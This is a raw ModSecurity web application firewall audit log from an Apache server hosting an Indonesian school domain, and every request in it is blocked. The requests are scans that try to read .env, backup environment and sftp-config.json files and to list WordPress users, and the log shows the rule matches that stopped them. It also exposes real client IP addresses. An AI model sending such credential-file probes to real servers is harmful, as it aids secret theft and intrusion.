1748780021652586 656 (- - -) Stopwatch2: 1748780021652586 656; combined=239, p1=208, p2=0, p3=0, p4=0, p5=31, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --860cb37b-Z-- --a6a35f47-A-- [01/Jun/2025:19:36:18 +0700] aDxJQu4LjVe0Eerk_ZbAsAAAAEQ 103.236.140.4 42820 103.236.140.4 8181 --a6a35f47-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 164.92.107.174 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --a6a35f47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6a35f47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748781378762543 657 (- - -) Stopwatch2: 1748781378762543 657; combined=234, p1=212, p2=0, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6a35f47-Z-- --27ff0f5e-A-- [01/Jun/2025:19:49:02 +0700] aDxMPgQHT18O7PnXxsRFrgAAAJY 103.236.140.4 42904 103.236.140.4 8181 --27ff0f5e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.145.142.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.145.142.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27ff0f5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27ff0f5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748782142555304 3086 (- - -) Stopwatch2: 1748782142555304 3086; combined=1307, p1=446, p2=829, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27ff0f5e-Z-- --2531505e-A-- [01/Jun/2025:20:01:43 +0700] aDxPN-4LjVe0Eerk_ZbEigAAAFQ 103.236.140.4 59182 103.236.140.4 8181 --2531505e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.200.53.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.200.53.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2531505e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2531505e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748782903172899 3086 (- - -) Stopwatch2: 1748782903172899 3086; combined=1433, p1=535, p2=862, p3=0, p4=0, p5=36, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2531505e-Z-- --ba907340-A-- [01/Jun/2025:20:14:03 +0700] aDxSG-4LjVe0Eerk_ZbKgAAAAFE 103.236.140.4 54864 103.236.140.4 8181 --ba907340-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --ba907340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba907340-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783643597497 770 (- - -) Stopwatch2: 1748783643597497 770; combined=346, p1=311, p2=0, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba907340-Z-- --d1c0477d-A-- [01/Jun/2025:20:14:03 +0700] aDxSG-4LjVe0Eerk_ZbKgQAAAE8 103.236.140.4 54874 103.236.140.4 8181 --d1c0477d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --d1c0477d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1c0477d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783643836031 799 (- - -) Stopwatch2: 1748783643836031 799; combined=343, p1=302, p2=0, p3=0, p4=0, p5=41, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1c0477d-Z-- --60fc7b2b-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQHT18O7PnXxsROFwAAAIw 103.236.140.4 54892 103.236.140.4 8181 --60fc7b2b-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --60fc7b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60fc7b2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644176162 847 (- - -) Stopwatch2: 1748783644176162 847; combined=351, p1=300, p2=0, p3=0, p4=0, p5=50, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60fc7b2b-Z-- --2e057101-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQHT18O7PnXxsROGAAAAIs 103.236.140.4 54894 103.236.140.4 8181 --2e057101-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2e057101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e057101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644414607 735 (- - -) Stopwatch2: 1748783644414607 735; combined=303, p1=264, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e057101-Z-- --e7d18408-A-- [01/Jun/2025:20:14:04 +0700] aDxSHAQ4kZQGAOBHoB6QjAAAAMw 103.236.140.4 54904 103.236.140.4 8181 --e7d18408-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e7d18408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7d18408-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644754308 872 (- - -) Stopwatch2: 1748783644754308 872; combined=352, p1=319, p2=0, p3=0, p4=0, p5=33, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d18408-Z-- --b98add34-A-- [01/Jun/2025:20:14:04 +0700] aDxSHO4LjVe0Eerk_ZbKggAAAE4 103.236.140.4 54914 103.236.140.4 8181 --b98add34-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b98add34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b98add34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783644992948 787 (- - -) Stopwatch2: 1748783644992948 787; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b98add34-Z-- --4af54526-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQHT18O7PnXxsROGQAAAIc 103.236.140.4 54928 103.236.140.4 8181 --4af54526-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --4af54526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af54526-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645333007 889 (- - -) Stopwatch2: 1748783645333007 889; combined=372, p1=323, p2=0, p3=0, p4=0, p5=49, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af54526-Z-- --2fa6f222-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQHT18O7PnXxsROGgAAAJI 103.236.140.4 54934 103.236.140.4 8181 --2fa6f222-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --2fa6f222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fa6f222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645571557 829 (- - -) Stopwatch2: 1748783645571557 829; combined=330, p1=280, p2=0, p3=0, p4=0, p5=50, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fa6f222-Z-- --f4d61449-A-- [01/Jun/2025:20:14:05 +0700] aDxSHQQ4kZQGAOBHoB6QlQAAAMI 103.236.140.4 54944 103.236.140.4 8181 --f4d61449-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f4d61449-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4d61449-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783645910552 780 (- - -) Stopwatch2: 1748783645910552 780; combined=308, p1=274, p2=0, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4d61449-Z-- --68d60a23-A-- [01/Jun/2025:20:14:06 +0700] aDxSHu4LjVe0Eerk_ZbKgwAAAFQ 103.236.140.4 54958 103.236.140.4 8181 --68d60a23-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --68d60a23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68d60a23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646149042 734 (- - -) Stopwatch2: 1748783646149042 734; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68d60a23-Z-- --7dca9f38-A-- [01/Jun/2025:20:14:06 +0700] aDxSHkaTRmdfB-FaJjn_ewAAAAU 103.236.140.4 54972 103.236.140.4 8181 --7dca9f38-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7dca9f38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dca9f38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646489383 830 (- - -) Stopwatch2: 1748783646489383 830; combined=343, p1=308, p2=0, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dca9f38-Z-- --6c76da04-A-- [01/Jun/2025:20:14:06 +0700] aDxSHgQHT18O7PnXxsROHAAAAJM 103.236.140.4 54978 103.236.140.4 8181 --6c76da04-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 129.146.124.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 129.146.124.161 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G900A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --6c76da04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c76da04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748783646727923 769 (- - -) Stopwatch2: 1748783646727923 769; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c76da04-Z-- --7fe7153d-A-- [01/Jun/2025:20:21:50 +0700] aDxT7gQHT18O7PnXxsRRJQAAAIc 103.236.140.4 41220 103.236.140.4 8181 --7fe7153d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.33.210 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.33.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7fe7153d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7fe7153d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748784110446691 870 (- - -) Stopwatch2: 1748784110446691 870; combined=392, p1=350, p2=0, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7fe7153d-Z-- --40c5704e-A-- [01/Jun/2025:20:29:45 +0700] aDxVye4LjVe0Eerk_ZbSDwAAAFU 103.236.140.4 59682 103.236.140.4 8181 --40c5704e-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --40c5704e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40c5704e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748784585613926 811 (- - -) Stopwatch2: 1748784585613926 811; combined=269, p1=228, p2=0, p3=0, p4=0, p5=41, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40c5704e-Z-- --8ea0da4d-A-- [01/Jun/2025:20:54:18 +0700] aDxbiu4LjVe0Eerk_ZbaegAAAFY 103.236.140.4 42334 103.236.140.4 8181 --8ea0da4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ea0da4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ea0da4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
